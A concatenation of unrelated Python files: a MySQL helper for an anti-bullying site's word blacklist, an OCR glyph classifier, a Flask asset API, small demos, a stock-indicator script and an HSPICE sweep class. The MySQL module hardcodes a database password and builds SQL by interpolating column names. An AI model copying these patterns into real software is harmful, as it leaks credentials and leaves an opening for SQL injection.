- Requires sender and message IDs as ints or strings
"""
# Connection settings for the MySQL server (used by every function below).
DB_HOST = "localhost"
DB_USER = "bully_shield"
DB_PSWD = "22224568"
DB_NAME = "bullyshield_website"
# Global list of black-listed words, populated by pull_blacklist().
blackList = []
def add_to_blacklist(word):
    """Insert word (lower-cased) into the black_list table.

    Uses REPLACE INTO so an existing row for the same word is overwritten.
    NOTE(review): does not check that the input is a single word yet.

    Parameters: word -- string to black-list.
    """
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    # Bind the word as a query parameter: the previous string concatenation
    # was open to SQL injection.  (Also removed an unused SELECT string.)
    sql = "REPLACE INTO `black_list` (`word`) VALUES (%s)"
    try:
        cursor.execute(sql, (word.lower(),))
        db.commit()
    except MySQLdb.Error:
        print("Something went wrong!")
        db.rollback()
    finally:
        if db:
            db.close()
def check_connection():
    """Check that a connection to the database can be established.

    Prints the server version on success, or an error message on failure.
    """
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)  # connect to database
    cursor = db.cursor()  # create cursor object
    sql = "SELECT VERSION()"  # SQL string to query db
    try:
        cursor.execute(sql)  # attempt to query db
        result = cursor.fetchone()  # fetch value of one row
        # Parenthesized single-argument print is valid under both
        # Python 2 and Python 3 (the rest of this module is Python 2).
        print("version: %s" % result)
    except MySQLdb.Error:
        print("Connection cannot be established")
    finally:
        if db:
            db.close()  # always close the connection
def get_flags(userID, flagToGet):
    """Return True if the given flag column equals 1 for the given user.

    Parameters: userID -- user id (int or str); flagToGet -- flag column name.
    NOTE(review): flagToGet is interpolated as a column name and cannot be a
    bound parameter -- callers must only pass trusted column names.
    """
    is_flagged = False
    # The user id is bound as a query parameter instead of being
    # concatenated into the statement (SQL-injection safe).
    sql = "SELECT `" + flagToGet + "` FROM `fos_user` WHERE id = %s"
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    try:
        cursor.execute(sql, (str(userID),))
        result = cursor.fetchone()
        # Guard against a missing row: fetchone() returns None when the
        # user id does not exist (previously crashed into the bare except).
        if result and result[0] == 1:
            is_flagged = True
    except MySQLdb.Error:
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    return is_flagged
def get_score(userID):
    """Return the current score for the given userID as an int.

    Raises ValueError if the score cannot be retrieved -- previously a
    failed query fell through to `int(result[0])` with `result` never
    assigned, raising a confusing NameError.
    """
    # The user id is bound as a query parameter (SQL-injection safe).
    sql = "SELECT `score` FROM `fos_user` WHERE id = %s"
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    result = None
    try:
        cursor.execute(sql, (str(userID),))
        result = cursor.fetchone()
    except MySQLdb.Error:
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    if result is None:
        raise ValueError("No score found for user id %s" % userID)
    return int(result[0])
def get_message(messageID):
    """Return the body of the message with the given messageID.

    Raises ValueError if the message cannot be retrieved -- previously a
    failed query fell through to `result[0]` with `result` never assigned,
    raising a confusing NameError.
    """
    # The message id is bound as a query parameter (SQL-injection safe).
    sql = "SELECT `body` FROM `message` WHERE id = %s"
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    result = None
    try:
        cursor.execute(sql, (str(messageID),))
        result = cursor.fetchone()
    except MySQLdb.Error:
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    if result is None:
        raise ValueError("No message found for id %s" % messageID)
    return result[0]
def increase_score(userID, score):
    """Add `score` points to the stored score of user `userID`."""
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    # Both values bound as parameters (the original concatenated them into
    # the SQL string, which was injectable).
    sql = ("UPDATE `fos_user` SET `score` = `score` + %s "
           "WHERE `fos_user`.`id` = %s")
    try:
        cursor.execute(sql, (str(score), str(userID)))
        db.commit()
    except MySQLdb.Error:
        print("Something went wrong!")
        db.rollback()
    finally:
        if db:
            db.close()
def mass_add_to_BL(fileToPush):
    """Read one word per line from `fileToPush` and add each to the blacklist.

    Words are lower-cased, stripped, and cleaned of quote/paren/backtick
    characters before insertion.  Fixes the original bug where the input
    file was closed inside the insertion loop's `finally` clause.
    """
    with open(fileToPush, "r") as wordFile:
        words = [re.sub('[)`,(\'"]', '', line.lower().strip())
                 for line in wordFile]
    for word in words:
        try:
            add_to_blacklist(word)
        except Exception:
            print("Something went wrong in mass add")
def pull_blacklist():
    """Load every word from the black_list table into the global blackList.

    Returns the global list.  Fixes the original bug where `return` inside
    `finally` made the `db.close()` call unreachable and silently swallowed
    any pending exception.
    """
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    try:
        cursor.execute("SELECT word FROM `black_list`")
        for row in cursor.fetchall():
            # Rows come back as 1-tuples; strip the tuple punctuation the
            # same way the original str()-based formatting did.
            word = re.sub('[),(\'"]', '', str(row).lower())
            blackList.append(word)
    except MySQLdb.Error:
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    return blackList
def set_flag(userId, flagToSet):
    """Set boolean column `flagToSet` to 1 for user `userId`.

    NOTE(review): `flagToSet` is interpolated as a column identifier —
    callers must pass only trusted, whitelisted column names.
    """
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    # Identifier interpolated; the user id is bound as a parameter.
    sql = "UPDATE `fos_user` SET `" + flagToSet + "` = '1' WHERE `fos_user`.`id` = %s"
    try:
        cursor.execute(sql, (str(userId),))
        db.commit()
    except MySQLdb.Error:
        print("Something went wrong!")
        db.rollback()
    finally:
        if db:
            db.close()
def unset_flag(userId, flagToSet):
    """Set boolean column `flagToSet` to 0 for user `userId`.

    NOTE(review): `flagToSet` is interpolated as a column identifier —
    callers must pass only trusted, whitelisted column names.
    """
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    # Identifier interpolated; the user id is bound as a parameter.
    sql = "UPDATE `fos_user` SET `" + flagToSet + "` = '0' WHERE `fos_user`.`id` = %s"
    try:
        cursor.execute(sql, (str(userId),))
        db.commit()
    except MySQLdb.Error:
        print("Something went wrong!")
        db.rollback()
    finally:
        if db:
            db.close()
def get_guardian_email(userId):
    """Return the guardian contact stored for `userId`, or None on failure."""
    guardian = None
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    try:
        # Parameterized query prevents SQL injection via userId.
        cursor.execute("SELECT guardian FROM `fos_user` WHERE id = %s",
                       (str(userId),))
        row = cursor.fetchone()
        # Guard against a missing row (original crashed on fetchone()[0]).
        if row:
            guardian = row[0]
    except MySQLdb.Error:
        # Read-only query — the original's rollback() was a no-op here.
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    return guardian
def get_other(userId, messageId):
    """Return the id of the other participant in the thread that contains
    message `messageId`, or None if it cannot be determined."""
    other_participant_id = None
    db = MySQLdb.connect(DB_HOST, DB_USER, DB_PSWD, DB_NAME)
    cursor = db.cursor()
    # Both ids bound as parameters (the original concatenated them).
    query = ("SELECT participant_id FROM thread_metadata "
             "WHERE thread_id IN (SELECT thread_id FROM message WHERE id = %s) "
             "AND participant_id != %s")
    try:
        cursor.execute(query, (str(messageId), str(userId)))
        row = cursor.fetchone()
        # Guard against a missing row (original crashed on fetchone()[0]).
        if row:
            other_participant_id = row[0]
    except MySQLdb.Error:
        print("Something went wrong!")
    finally:
        if db:
            db.close()
    return other_participant_id
|
import pandas as pd
import numpy as np
from PIL import Image
# Format a number keeping only `digits` decimal places (default 3).
def toFixed(numObj, digits=3):
    """Return `numObj` formatted with exactly `digits` digits after the point.

    Fixes the original bug where a stray literal '2' was appended to every
    formatted value (f"{numObj:.{digits}f}2").
    """
    return f"{numObj:.{digits}f}"
# Binary images store foreground as 255 rather than 1; normalize that here.
def foo(item):
    """Map a binary-image pixel value to 1 when it is 255, otherwise 0."""
    return 1 if item == 255 else 0
def weight_of_black(image, arr):
    """Return (black-pixel count, black fraction) for the crop box in `arr`.

    `arr` holds (left, upper, right, lower) crop coordinates.  A pixel is
    black when its normalized value (via foo) is 0.
    """
    glyph = image.crop((arr[0], arr[1], arr[2], arr[3]))
    w, h = glyph.size
    white = sum(foo(glyph.getpixel((col, row)))
                for col in range(w) for row in range(h))
    black = w * h - white
    return black, black / (w * h)
def coords_of_center_of_gravity(image, arr):
    """Return the (x, y) centre of gravity of the black pixels in the crop box.

    Coordinates are 1-based and weighted by black pixels (normalized value 0).
    The two identical pixel scans of the original are merged into one pass;
    the per-sum integer addition order is unchanged.
    """
    glyph = image.crop((arr[0], arr[1], arr[2], arr[3]))
    w, h = glyph.size
    x_moment = 0
    y_moment = 0
    for col in range(w):
        for row in range(h):
            black = 1 - foo(glyph.getpixel((col, row)))
            x_moment += (col + 1) * black
            y_moment += (row + 1) * black
    black_count = weight_of_black(image, arr)[0]
    return x_moment / black_count, y_moment / black_count
def norm_coords_of_center_of_gravity(image, arr):
    """Return the black-pixel centre of gravity normalized to [0, 1] per axis."""
    glyph = image.crop((arr[0], arr[1], arr[2], arr[3]))
    w, h = glyph.size
    x_moment = 0
    y_moment = 0
    for col in range(w):
        for row in range(h):
            black = 1 - foo(glyph.getpixel((col, row)))
            x_moment += (col + 1) * black
            y_moment += (row + 1) * black
    black_count = weight_of_black(image, arr)[0]
    return (((x_moment / black_count) - 1) / (w - 1),
            ((y_moment / black_count) - 1) / (h - 1))
def norm_axial_moments_of_inertia(image, arr):
    """Return the horizontal and vertical moments of inertia of the black
    pixels about the centre of gravity, normalized by (w^2 + h^2)."""
    glyph = image.crop((arr[0], arr[1], arr[2], arr[3]))
    w, h = glyph.size
    cx, cy = coords_of_center_of_gravity(image, arr)
    horizontal = 0
    vertical = 0
    for col in range(w):
        for row in range(h):
            black = 1 - foo(glyph.getpixel((col, row)))
            horizontal += black * ((row + 1 - cy) ** 2)
            vertical += black * ((col + 1 - cx) ** 2)
    norm = (w ** 2) + (h ** 2)
    return horizontal / norm, vertical / norm
# Proximity measure: maps a distance d >= 0 into (0, 1], equal to 1 at d == 0.
def p_measure(d):
    """Return the proximity score 1 / (1 + 0.8 * d) for distance `d`."""
    return 1 / (1 + 0.8 * d)
class Predictor:
    """Nearest-neighbour style classifier.

    Stores the training matrix X and labels y.  predict() ranks every
    training sample by Euclidean distance to each query row and returns,
    per query, the full list of (label, proximity) pairs ordered from
    nearest to farthest.
    """
    def __init__(self, X, y):
        self.X = X
        self.y = y
    def predict(self, X):
        results = []
        for query in X:
            # Squared distance accumulated column by column (vectorized
            # over all training rows).
            dist_sq = 0
            for col, feature in enumerate(query):
                dist_sq += (self.X[:, col] - feature) ** 2
            dist = np.sqrt(dist_sq)
            order = np.argsort(dist)
            ranked = [(self.y[i], float(toFixed(p_measure(dist[i]), 5)))
                      for i in order]
            results.append(ranked)
        return results
def process_image(df_data, image, arrs):
    """Extract features for every crop box in `arrs`, classify each symbol
    against the reference table `df_data`, and return (string, predictions).

    `string` is the concatenation of the best-guess character per box;
    `predictions` is the full ranked (label, proximity) list per box.
    """
    # Compute each feature pair once per box — the original called
    # norm_coords_of_center_of_gravity and norm_axial_moments_of_inertia
    # twice per box (full pixel scans), doubling the work for no benefit.
    weights = [weight_of_black(image, arr)[1] for arr in arrs]
    centers = [norm_coords_of_center_of_gravity(image, arr) for arr in arrs]
    moments = [norm_axial_moments_of_inertia(image, arr) for arr in arrs]
    df = pd.DataFrame({'A': weights,
                       'B': [c[0] for c in centers],
                       'C': [c[1] for c in centers],
                       'D': [m[0] for m in moments],
                       'E': [m[1] for m in moments]})
    columns = ['symbol', 'B', 'E', 'F', 'I', 'J']
    train = df_data[columns]
    X_train = train.drop(columns=['symbol']).values
    y_train = train['symbol'].values
    X_test = df.values
    # Standardize, then min-max scale, using training statistics only.
    mean_ = X_train.mean(axis=0)
    std_ = X_train.std(axis=0)
    X_train = (X_train - mean_) / std_
    X_test = (X_test - mean_) / std_
    max_ = X_train.max(axis=0)
    min_ = X_train.min(axis=0)
    X_train = (X_train - min_) / (max_ - min_)
    X_test = (X_test - min_) / (max_ - min_)
    predictor = Predictor(X_train, y_train)
    predictions = predictor.predict(X_test)
    # Best guess per symbol is the first (nearest) label.
    string = ''.join(item[0][0] for item in predictions)
    return string, predictions
def _predict_file(df_data, image_path, coords_path, out_path):
    """Run recognition for one image.

    Reads crop boxes (one whitespace-separated line of ints per box, with a
    trailing token dropped as in the original) from `coords_path`, classifies
    the symbols in `image_path`, writes the ranked predictions to `out_path`,
    prints and returns the recognized string.
    """
    image = Image.open(image_path)
    arrs = []
    with open(coords_path) as file:
        for line in file:
            fields = line.split(' ')
            fields.pop()  # the original dropped the last (newline) token
            arrs.append([int(item) for item in fields])
    string, predictions = process_image(df_data, image, arrs)
    with open(out_path, 'w', encoding="utf-8") as f:
        for item in predictions:
            f.write(str(item) + "\n")
    print(string)
    return string

def main():
    """Recognize symbols in the three prepared images using signs.csv.

    The original repeated the identical load/classify/dump pipeline three
    times verbatim; it is factored into _predict_file.
    """
    df_data = pd.read_csv("signs.csv", sep=';')
    _predict_file(df_data, "cropped_text.bmp", "coords.txt", "predictions.txt")
    _predict_file(df_data, "cropped_text2.bmp", "coords2.txt", "predictions2.txt")
    _predict_file(df_data, "cropped_text3.bmp", "coords3.txt", "predictions3.txt")

if __name__ == "__main__":
    main()
from flask_restful import Resource, reqparse
from backend.main_api import main_api
from backend.models import Asset, AssetSchema, User, Branch, AssetCostCenterSchema, AssetCostCenter, CostCenter
from backend.db import save_to_db, delete_from_db
from flask_jwt_extended import jwt_required
from backend.api.utils import can, able, get_user
class GetAssets(Resource):
    """List every asset of one branch within the caller's installation."""
    def __init__(self):
        self.parser = reqparse.RequestParser()
        self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='view', thing='assets')
    def get(self):
        args = self.parser.parse_args()
        # Scope the query to the caller's installation and requested branch.
        matches = Asset.query.join(Branch, Branch.id == Asset.branch_id) \
            .filter(Branch.installation_id == get_user().installation_id) \
            .filter(Branch.id == args['branch_id']) \
            .all()
        serialized = AssetSchema(many=True).dump(matches).data if matches else []
        return {
            'status': 1,
            'edit': able('edit', 'assets'),
            'add': able('add', 'assets'),
            'delete': able('delete', 'assets'),
            'assets': serialized
        }
class GetAssetCostCenters(Resource):
    """List one asset's cost-centre allocations plus the selectable
    cost-centre options for its branch."""
    def __init__(self):
        self.parser = reqparse.RequestParser()
        self.parser.add_argument('branch_id', help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='view', thing='assets')
    def get(self, asset_id):
        args = self.parser.parse_args()
        installation_id = get_user().installation_id
        allocations = AssetCostCenter.query.filter_by(asset_id=asset_id) \
            .join(Asset, Asset.id == AssetCostCenter.asset_id) \
            .join(Branch, Branch.id == Asset.branch_id) \
            .filter(Branch.installation_id == installation_id) \
            .filter(Branch.id == args['branch_id']).all()
        # Expose the raw cost-centre id under .name for the serializer.
        for allocation in allocations:
            allocation.name = allocation.costcenter_id
        serialized = (AssetCostCenterSchema(many=True).dump(allocations).data
                      if allocations else [])
        branch_cost_centers = CostCenter.query \
            .join(Branch, Branch.id == CostCenter.branch_id) \
            .filter(Branch.installation_id == installation_id) \
            .filter(Branch.id == args['branch_id']).all()
        options = {"0": "Choose Cost Center"}
        for cost_center in branch_cost_centers:
            options["{}".format(cost_center.id)] = cost_center.name
        return {
            'status': 1,
            'edit': able('edit', 'assets'),
            'add': able('add', 'assets'),
            'delete': able('delete', 'assets'),
            'assets_cost_centers': serialized,
            'cost_center_options': options
        }
class AddAssetCostCenter(Resource):
    """Create a cost-centre allocation for an asset."""
    def __init__(self):
        self.parser = reqparse.RequestParser()
        self.parser.add_argument('costcenter_id', help='This field cannot be blank', required=True)
        self.parser.add_argument('rating_pct', help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='add', thing='assets')
    def post(self, asset_id):
        data = self.parser.parse_args()
        asset_cost_center = AssetCostCenter(
            asset_id=asset_id,
            costcenter_id=data['costcenter_id'],
            rating_pct=data['rating_pct'],
        )
        try:
            save_to_db(asset_cost_center)
            return {'status': 1, 'id': asset_cost_center.id}
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are no longer swallowed; persistence failures return HTTP 500.
            return {'status': 0}, 500
class EditAssetCostCenter(Resource):
    """Update one cost-centre allocation of an asset."""
    def __init__(self):
        self.parser = reqparse.RequestParser()
        self.parser.add_argument('costcenter_id', help='This field cannot be blank', required=True)
        self.parser.add_argument('rating_pct', help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='edit', thing='assets')
    def post(self, asset_id, asset_cost_center_id):
        data = self.parser.parse_args()
        # Scope the lookup to the caller's installation so foreign
        # allocations cannot be edited.
        asset_cost_center = AssetCostCenter.query.filter_by(id=asset_cost_center_id)\
            .join(Asset, Asset.id == AssetCostCenter.asset_id)\
            .filter(Asset.id == asset_id)\
            .join(Branch, Branch.id == Asset.branch_id)\
            .filter(Branch.installation_id == get_user().installation_id).first()
        if not asset_cost_center:
            return {'status': 0}
        asset_cost_center.asset_id = asset_id
        asset_cost_center.costcenter_id = data['costcenter_id']
        asset_cost_center.rating_pct = data['rating_pct']
        try:
            save_to_db(asset_cost_center)
            return {'status': 1}
        except Exception:
            # Narrowed from a bare `except:`.
            return {'status': 0}, 500
class DeleteAssetCostCenter(Resource):
    """Delete one cost-centre allocation, or several when the URL segment
    `asset_cost_center_id` equals 'mass' (ids then come from the form)."""
    @jwt_required
    @can('delete', 'assets')
    def post(self, asset_id, asset_cost_center_id):
        user = get_user()
        if asset_cost_center_id == 'mass':
            parser = reqparse.RequestParser()
            parser.add_argument('ids', help='This field cannot be blank', required=True, type=int, action='append')
            data = parser.parse_args()
            assets_cost_centers = AssetCostCenter.query.filter(AssetCostCenter.id.in_(data['ids']))\
                .join(Asset, Asset.id == AssetCostCenter.asset_id)\
                .filter(Asset.id == asset_id)\
                .join(Branch, Branch.id == Asset.branch_id)\
                .filter(Branch.installation_id == user.installation_id).all()
        else:
            assets_cost_centers = AssetCostCenter.query.filter_by(id=asset_cost_center_id)\
                .join(Asset, Asset.id == AssetCostCenter.asset_id)\
                .filter(Asset.id == asset_id)\
                .join(Branch, Branch.id == Asset.branch_id)\
                .filter(Branch.installation_id == user.installation_id).first()
        if not assets_cost_centers:
            return {'status': 0}
        try:
            delete_from_db(assets_cost_centers)
            return {'status': 1}
        except Exception:
            # Narrowed from a bare `except:`.
            return {'status': 0}, 500
class GetAsset(Resource):
    """Fetch a single asset by id, scoped to the caller's installation."""
    @jwt_required
    @can(action='view', thing='assets')
    def get(self, asset_id):
        assets = Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
            .filter(Branch.installation_id == get_user().installation_id).all()
        if not assets:
            # The original indexed assets_data[0] unconditionally and raised
            # an unhandled IndexError when the asset was missing or belonged
            # to another installation.
            return {'status': 0}
        assets_data = AssetSchema(many=True).dump(assets).data
        return {
            'status': 1,
            'edit': able('edit', 'assets'),
            'add': able('add', 'assets'),
            'delete': able('delete', 'assets'),
            'asset': assets_data[0]
        }
class AddAsset(Resource):
    """Create a new asset from the posted form fields (all mandatory)."""
    def __init__(self):
        self.parser = reqparse.RequestParser()
        # Every field is required; register them in one loop instead of
        # eleven near-identical statements.
        for field in ('description', 'description_det', 'inventory_qt',
                      'cost_price_unit', 'acquisition_date', 'start_depr_date',
                      'expiration_depr_date', 'depreciable_flag', 'branch_id',
                      'type_id', 'local_id'):
            self.parser.add_argument(field, help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='add', thing='assets')
    def post(self):
        data = self.parser.parse_args()
        asset = Asset(
            description=data['description'],
            description_det=data['description_det'],
            inventory_qt=data['inventory_qt'],
            cost_price_unit=data['cost_price_unit'],
            acquisition_date=data['acquisition_date'],
            start_depr_date=data['start_depr_date'],
            expiration_depr_date=data['expiration_depr_date'],
            depreciable_flag=data['depreciable_flag'],
            type_id=data['type_id'],
            local_id=data['local_id'],
            branch_id=data['branch_id'],
        )
        try:
            save_to_db(asset)
            return {'status': 1}
        except Exception:
            # Narrowed from a bare `except:`; the unused `user = get_user()`
            # local was also dropped.
            return {'status': 0}, 500
class DeleteAsset(Resource):
    """Delete one asset, or several when asset_id == 'mass' (ids from form)."""
    @jwt_required
    @can('delete', 'assets')
    def post(self, asset_id):
        # The original fetched `user` and then called get_user() again in
        # the filters; resolve the installation id once.
        installation_id = get_user().installation_id
        if asset_id == 'mass':
            parser = reqparse.RequestParser()
            parser.add_argument('ids', help='This field cannot be blank', required=True, type=int, action='append')
            data = parser.parse_args()
            assets = Asset.query.filter(Asset.id.in_(data['ids'])).join(Branch, Branch.id == Asset.branch_id) \
                .filter(Branch.installation_id == installation_id).all()
        else:
            assets = Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
                .filter(Branch.installation_id == installation_id).first()
        if not assets:
            return {'status': 0}
        try:
            delete_from_db(assets)
            return {'status': 1}
        except Exception:
            # Narrowed from a bare `except:`.
            return {'status': 0}, 500
class EditAsset(Resource):
    """Update every editable column of an existing asset."""
    # Single source of truth for the editable/required columns (the original
    # repeated this list in __init__ and post).
    FIELDS = ('description', 'description_det', 'inventory_qt',
              'cost_price_unit', 'acquisition_date', 'start_depr_date',
              'expiration_depr_date', 'depreciable_flag', 'branch_id',
              'type_id', 'local_id')
    def __init__(self):
        self.parser = reqparse.RequestParser()
        for field in self.FIELDS:
            self.parser.add_argument(field, help='This field cannot be blank', required=True)
    @jwt_required
    @can(action='edit', thing='assets')
    def post(self, asset_id):
        data = self.parser.parse_args()
        asset = Asset.query.filter_by(id=asset_id).join(Branch, Branch.id == Asset.branch_id) \
            .filter(Branch.installation_id == get_user().installation_id).first()
        if not asset:
            return {'status': 0}
        for field in self.FIELDS:
            setattr(asset, field, data[field])
        try:
            save_to_db(asset)
            return {'status': 1}
        except Exception:
            # Narrowed from a bare `except:`; the unused `user` local and the
            # pointless `'%s' % i` formatting were dropped.
            return {'status': 0}, 500
def register_assets_routes():
    """Attach every asset endpoint to the main API."""
    routes = (
        (GetAsset, '/api/asset/<asset_id>'),
        (GetAssets, '/api/assets'),  # View
        (GetAssetCostCenters, '/api/assets/cost_centers/<asset_id>'),  # View
        (AddAssetCostCenter, '/api/assets/cost_centers/<asset_id>/add'),
        (EditAssetCostCenter, '/api/assets/cost_centers/<asset_id>/edit/<asset_cost_center_id>'),
        (DeleteAssetCostCenter, '/api/assets/cost_centers/<asset_id>/delete/<asset_cost_center_id>'),
        (AddAsset, '/api/assets/add'),  # Add
        (EditAsset, '/api/assets/edit/<asset_id>'),  # Edit
        (DeleteAsset, '/api/assets/delete/<asset_id>'),  # Delete
    )
    for resource, path in routes:
        main_api.add_resource(resource, path)
|
#!/usr/bin/env python
# Demonstrates controlling element order when iterating or serializing a dict.
from collections import OrderedDict

# An OrderedDict is roughly twice the size of a plain dict because it keeps an
# extra internal linked list.  When building structures with very many
# instances (e.g. reading 100,000 CSV rows into a list of OrderedDicts), weigh
# the ordering guarantee against the extra memory cost.
d = OrderedDict()
d['foo'] = 1
d['bar'] = 2
d['spam'] = 3
d['grok'] = 4
# Outputs "foo 1", "bar 2", "spam 3", "grok 4"
for key in d:
    print(key, d[key])
print("--------")
# Plain dict for comparison.
dictionar = {'foo': 1, 'bar': 2, 'spam': 3, 'grok': 4}
for key in dictionar:
    # Fixed: the original looked the key up in `d` while iterating `dictionar`.
    print(key, dictionar[key])
|
# functions
def print_separator():
    """Print a two-line visual separator on the console."""
    print('--------')
    print('here')

# instructions
print("Hello World")

# variables
name = 'Wes'
age = 31
total = 99.78
found = False

print(name)
print(age)
print(total)
print(age + 13)
print_separator()

# if statements
user_age = 79
if user_age < 80:
    print('You are still young')
elif user_age == 80:
    print("You are on the border")
else:
    print("sorry, you are getting OLD :/")
import requests

# POST a small form payload to httpbin's echo endpoint and inspect the reply.
url = 'http://httpbin.org/post'
data = {'name': '孔维一', 'age': 21}
resp = requests.post(url, data=data)

print(type(resp))
print(resp)
print(resp.text)
print(resp.json())
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import pandas_datareader.data as data
import os
import ta
# Ticker symbol to analyse.  The original wrapped the prompt literal in
# str(), which is a no-op (input() takes a str and returns a str).
ticker = input("Enter ticker: ")
def get_stock_prices():
    """Download daily prices for the global `ticker` from Yahoo
    (2018-01-01 through today) and save them to
    C:\\PythonClass\\ta-ticker\\<ticker>.csv."""
    data_source = 'yahoo'
    start = dt.datetime(2018, 1 ,1)
    end = dt.datetime.today()
    df= data.DataReader(ticker, data_source, start, end)
    # Hard-coded Windows output directory; must exist beforehand.
    df.to_csv('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker))
    print("Stock prices of {} is pulled!".format(ticker))
def tech_analysis():
    """Compute SMA, RSI(14) and CCI(21) columns for the previously downloaded
    CSV of the global `ticker`, save the last 250 rows to an .xlsx workbook,
    and delete the raw CSV."""
    df = pd.read_csv('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker), parse_dates=True, index_col=0)
    # Simple moving averages over several windows; min_periods=0 fills the
    # leading rows with partial-window means instead of NaN.
    df['200ma'] = df['Adj Close'].rolling(window=200, min_periods=0).mean()
    df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
    df['50ma'] = df['Adj Close'].rolling(window=50, min_periods=0).mean()
    df['20ma'] = df['Adj Close'].rolling(window=20, min_periods=0).mean()
    df['10ma'] = df['Adj Close'].rolling(window=10, min_periods=0).mean()
    df['5ma'] = df['Adj Close'].rolling(window=5, min_periods=0).mean()
    print("Moving Averages are created!")
    """Calculate RSI - Relative Strenght Index"""
    # RSI: split daily deltas into gain/loss series, take 14-day simple
    # rolling means, then RSI = 100 - 100 / (1 + avg_gain/avg_loss).
    delta = df['Close'].diff()
    window = 14
    up_days = delta.copy()
    up_days[delta<=0]=0.0
    down_days = abs(delta.copy())
    down_days[delta>0]=0.0
    RS_up = up_days.rolling(window).mean()
    RS_down = down_days.rolling(window).mean()
    rsi= 100-100/(1+RS_up/RS_down)
    df['RSI']=rsi
    print("Relative Strenght Index of 14 is created!")
    """Calculate CCI - Commodity Channel Index"""
    # CCI over 21 days from the typical price (H+L+C)/3.
    # NOTE(review): the usual Lambert constant is 0.015; this code uses
    # 0.014 — confirm whether that is intentional before changing it.
    ndays=21
    TP = (df['High'] + df['Low'] + df['Close']) / 3
    df['CCI'] = pd.Series((TP - TP.rolling(ndays).mean()) / (0.014 * TP.rolling(ndays).std()),name = 'CCI')
    print("Commodity Channel Index of 21 is created!")
    #Save analysis file and remove the historic data
    df.tail(250).to_excel('C:\\PythonClass\\ta-ticker\\{}_SMAanalysis.xlsx'.format(ticker))
    os.remove('C:\\PythonClass\\ta-ticker\\{}.csv'.format(ticker))
    print("NOTE: Stock prices data file is removed!")
# Script entry: pull the price CSV, then build the indicator workbook.
get_stock_prices()
tech_analysis()
|
################ modules for HSPICE sim ######################
##############################################################
######### varmap definition ####################
##############################################################
### This class is to make combinations of given variables ####
### mostly used for testbench generation #################
### EX: varmap1=HSPICE_varmap.varmap(4) %%num of var=4 #######
### varmap1.get_var('vdd',1.5,1.8,0.2) %%vdd=1.5:0.2:1.8##
### varmap1.get_var('abc', ........ %%do this for 4 var ##
### varmap1.cal_nbigcy() %%end of var input###
### varmap1.combinate %%returns variable comb 1 by 1 ####
##############################################################
class varmap:
    """Enumerates every combination of swept variables for testbench generation.

    Usage: call get_var() once per variable (name, start, end, step), then
    cal_nbigcy() to finish setup, then combinate() once — it recurses through
    all combinations and appends them column-wise to self.comblist
    (one list per variable: [name, v1, v2, ...]).
    """
    #def __init__(self,num_var):
    # self.n_smlcycle=1
    # self.last=0
    # self.smlcy=1
    # self.bigcy=0
    # self.vv=0
    # self.vf=1
    # self.size=num_var
    # self.map=[None]*self.size
    # self.comblist=[None]*self.size
    # self.nvar=0
    def __init__(self):
        # total number of combinate() steps (recomputed in cal_nbigcy)
        self.n_smlcycle=1
        self.last=0
        self.smlcy=1   # step counter for the combinate() recursion
        self.bigcy=0   # number of completed combinations
        self.vv=0      # index of the variable currently being advanced
        self.vf=1
        #self.map=[None]
        #self.comblist=[None]
        self.nvar=0    # number of variables registered so far
    def get_var(self,name,start,end,step):
        """Register a swept variable `name` with values start, start+step, ..., end.

        NOTE(review): nswp is computed with // so with float steps it is a
        float and range() below will raise — TODO confirm sweeps are integral.
        """
        if self.nvar==0:
            self.map=[None]
            self.comblist=[None]
        else:
            self.map.append(None)
            self.comblist.append(None)
        self.map[self.nvar]=list([name])
        self.comblist[self.nvar]=list([name])
        self.nswp=(end-start)//step+1
        for i in range(1,self.nswp+1):
            self.map[self.nvar].append(start+step*(i-1))
        self.nvar+=1
    def cal_nbigcy(self):
        """Finish setup: reset per-variable cursors (self.bias) and compute
        the expected number of combinate() steps."""
        self.bias=[1]*(len(self.map))
        for j in range(1,len(self.map)+1):
            self.n_smlcycle=self.n_smlcycle*(len(self.map[j-1])-1)
        self.n_smlcycle=self.n_smlcycle*len(self.map)
    def increm(self,inc): #increment bias
        self.bias[inc]+=1
        if self.bias[inc]>len(self.map[inc])-1:
            # NOTE(review): this expression discards its result — it looks
            # like it was meant to wrap the cursor, e.g.
            # self.bias[inc] %= len(self.map[inc])-1.  Confirm before fixing.
            self.bias[inc]%len(self.map[inc])-1
    def check_end(self,vf): #When this is called, it's already last stage of self.map[vf]
        # Reset this variable's cursor and carry the increment into the
        # previous column, recursing while previous columns are exhausted.
        self.bias[vf]=1
